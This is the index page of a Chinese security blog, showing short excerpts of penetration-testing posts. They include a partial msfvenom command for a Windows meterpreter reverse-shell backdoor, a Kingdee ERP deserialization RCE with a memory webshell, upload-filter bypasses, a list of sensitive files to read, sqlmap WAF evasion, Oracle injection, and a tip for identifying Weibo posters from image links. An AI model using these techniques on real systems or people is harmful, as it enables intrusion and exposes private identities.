会员
T恤
新闻
博问
闪存
赞助商
Chat2DB
所有博客
当前博客
我的博客
我的园子
账号设置
会员中心
简洁模式
...
退出登录
注册
登录
拾瑾
博客园
首页
新随笔
联系
订阅
管理
随笔 - 36
文章 - 0
评论 - 16
阅读 -
66886
2024年11月18日
金蝶erp反序列化RCE+哥斯拉内存马
摘要: 漏洞介绍 由于金蝶云星空管理中心在处理序列化数据时,未对数据进行签名或校验,攻击手可以写入包含恶意代码的序列化数据,系统在进行反序列化时造成远程命令执行,该“管理中心“是提供给管理员使用的管理端,默认开放于8000端口。 影响版本 6.x版本:低于6.2.1012.47.x版本:7.0.352.16
阅读全文
posted @ 2024-11-18 10:49 拾瑾
阅读(282)
评论(0)
推荐(0)
2022年6月6日
Python模块批量更新pip-review
摘要: pip-review 基本使用方法: pip install pip-review #查看可更新 pip-review #自动批量升级 pip-review --auto #以交互方式运行,对每个包进行升级 pip-review --interactive
阅读全文
posted @ 2022-06-06 13:52 拾瑾
阅读(181)
评论(0)
推荐(0)
2021年12月21日
渗透测试之后门软件
摘要: 1. 制作Windows恶意软件 1.1 使用msfvenom生成后门木马 制作后门程序 sudo msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.142.135 LPORT=44
阅读全文
posted @ 2021-12-21 23:57 拾瑾
阅读(459)
评论(1)
推荐(0)
2021年11月26日
关于Metasploit 数据库连接失败
摘要: 关于开启msfconsole遇到数据库连接的问题 首先,确认一下,postgresql 服务是否已经启动。 如未启动,输入 service postgresql start kali用下面这句命令 /etc/init.d/postgresql start 如果不奏效,在msf中直接使用msfdb d
阅读全文
posted @ 2021-11-26 17:44 拾瑾
阅读(791)
评论(0)
推荐(0)
2021年11月8日
文件上传
摘要: 文件上传 1. 文件类型检测绕过 1.1. 更改请求绕过 有的站点仅仅在前端检测了文件类型,这种类型的检测可以直接修改网络请求绕过。 同样的,有的站点在后端仅检查了HTTP Header中的信息,比如 Content-Type 等,这种检查同样可以通过修改网络请求绕过。 1.2. Magic检测绕过
阅读全文
posted @ 2021-11-08 14:34 拾瑾
阅读(109)
评论(0)
推荐(0)
文件读取漏洞之常见敏感文件
摘要: 考虑读取可能有敏感信息的文件 用户目录下的敏感文件 .bash_history .zsh_history .profile .bashrc .gitconfig .viminfo passwd 应用的配置文件 /etc/apache2/apache2.conf /etc/nginx/nginx.co
阅读全文
posted @ 2021-11-08 14:12 拾瑾
阅读(57)
评论(0)
推荐(0)
2021年10月25日
sqlmap之绕过waf思路
摘要: 1.设置请求头 --random-agent --user-agent="User-Agent':'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" --user-agent="M
阅读全文
posted @ 2021-10-25 15:48 拾瑾
阅读(274)
评论(0)
推荐(0)
2021年10月11日
【小技巧分享】如何通过微博图片进行社工Po主
摘要: 通过微博图片链接可以直接找到发图的人 例: 图片地址: https://tvax1.sinaimg.cn/crop.0.0.1080.1080.180/63885668ly8geyrcrw0zjj20u00u0mz6.jpg?KID=imgbed,tva&Expires=1620073273&ssi
阅读全文
posted @ 2021-10-11 14:53 拾瑾
阅读(549)
评论(0)
推荐(0)
2021年10月8日
Windows11恢复传统右键菜单
摘要: 一、cmd修改注册表(推荐) Win11切换经典右键菜单: reg add "HKCU\Software\Classes\CLSID\{86ca1aa0-34aa-4e8b-a509-50c905bae2a2}\InprocServer32" /f /ve taskkill /f /im explo
阅读全文
posted @ 2021-10-08 08:58 拾瑾
阅读(13577)
评论(0)
推荐(0)
2021年9月24日
sql注入之Oracle注入
摘要: Oracle注入 1.Oracle的数据类型是强匹配的(MYSQL有弱匹配的味道),所以在Oracle进行类似UNION查询数据时候必须让对应位置上的数据类型和表中的列的数据类型是一致的,也可以使用null代替某些无法快速猜测出数据类型的位置。 2.Oracle的单行注释符号是-- ,多行注释符号/
阅读全文
posted @ 2021-09-24 10:13 拾瑾
阅读(5560)
评论(0)
推荐(1)
下一页
公告
昵称:
拾瑾
园龄:
4年3个月
粉丝:
15
关注:
5
+加关注
<
2025年4月
>
日
一
二
三
四
五
六
30
31
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1
2
3
4
5
6
7
8
9
10
搜索
常用链接
我的随笔
我的评论
我的参与
最新评论
我的标签
最新随笔
1.金蝶erp反序列化RCE+哥斯拉内存马
2.Python模块批量更新pip-review
3.渗透测试之后门软件
4.关于Metasploit 数据库连接失败
5.文件上传
6.文件读取漏洞之常见敏感文件
7.sqlmap之绕过waf思路
8.【小技巧分享】如何通过微博图片进行社工Po主
9.Windows11恢复传统右键菜单
10.sql注入之Oracle注入
我的标签
渗透测试
(7)
信息收集
(6)
sql注入
(4)
python
(2)
Metasploitable
(2)
linux
(2)
中间件
(2)
sqlmap
(1)
应急响应
(1)
社工
(1)
更多
随笔分类
Linux(1)
Metasploitable(2)
python(1)
理论(5)
密码学(2)
内网渗透(1)
其他(2)
社工(1)
渗透测试(10)
实验(1)
信息收集(3)
随笔档案
2024年11月(1)
2022年6月(1)
2021年12月(1)
2021年11月(3)
2021年10月(3)
2021年9月(8)
2021年8月(4)
2021年6月(2)
2021年3月(4)
2021年2月(5)
2021年1月(4)
阅读排行榜
1. 写一个执行cmd命令的bat脚本(18100)
2. Windows11恢复传统右键菜单(13577)
3. sql注入之Oracle注入(5560)
4. 网络安全应急响应流程图(4197)
5. 常见sql注入payload(2334)
评论排行榜
1. 渗透测试之后门软件(1)
推荐排行榜
1. 写一个执行cmd命令的bat脚本(3)
2. 常见sql注入payload(2)
3. sql注入之Oracle注入(1)
4. Metasploitable2 靶机漏洞(1)
5. 网络安全应急响应流程图(1)
最新评论
1. Re:渗透测试之后门软件
打的好呀
--前女友破鞋
点击右上角即可分享